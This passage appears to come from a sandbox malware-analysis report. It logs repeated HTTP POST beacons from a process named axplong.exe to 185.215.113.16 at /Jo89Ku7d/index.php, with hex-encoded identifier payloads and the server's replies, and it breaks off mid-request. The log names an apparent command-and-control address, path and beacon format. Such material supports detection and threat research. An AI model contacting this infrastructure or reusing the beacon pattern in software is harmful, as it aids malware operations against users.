                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:07.068056107 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:06 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      4192.168.2.553651185.215.113.16807856C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 13:44:07.187690973 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:07.941807985 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:07 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:07.942713022 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:08.190907955 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:08 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      5192.168.2.553652185.215.113.16807856C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 13:44:08.312820911 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:09.065239906 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:08 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:09.065877914 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:09.321120977 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:09 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      6192.168.2.553653185.215.113.16807856C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 13:44:09.439378977 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:10.221355915 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:10 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:10.222194910 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:10.481286049 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:10 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      7192.168.2.553654185.215.113.16807856C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 13:44:10.595560074 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:11.379457951 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:11 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:11.382344961 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:11.635154009 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:11 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      8192.168.2.553655185.215.113.16807856C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 13:44:11.752181053 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:12.595117092 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:12 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:12.596424103 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:12.879328966 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:12 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      9192.168.2.553656185.215.113.16807856C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 13:44:12.999011993 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:13.813911915 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:13 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:13.814675093 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:14.070489883 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:13 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      10192.168.2.553657185.215.113.16807856C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 13:44:14.189224005 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:14.946468115 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:14 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:14.947299957 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:15.200756073 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:15 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      11192.168.2.553658185.215.113.16807856C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 13:44:15.311961889 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:16.117976904 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:15 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:16.118776083 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:16.517405987 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:16 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      12192.168.2.553659185.215.113.16807856C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 13:44:16.643441916 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:17.400667906 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:17 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:17.401375055 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:17.661652088 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:17 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      13192.168.2.553660185.215.113.16807856C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 13:44:17.780222893 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:18.545650959 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:18 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:18.546478033 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:18.798448086 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:18 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      14192.168.2.553661185.215.113.16807856C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 13:44:18.934989929 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:19.691845894 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:19 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:19.694761038 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:19.945610046 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:19 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      15192.168.2.553662185.215.113.16807856C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 13:44:20.251146078 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:21.031054974 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:20 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:21.039736032 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
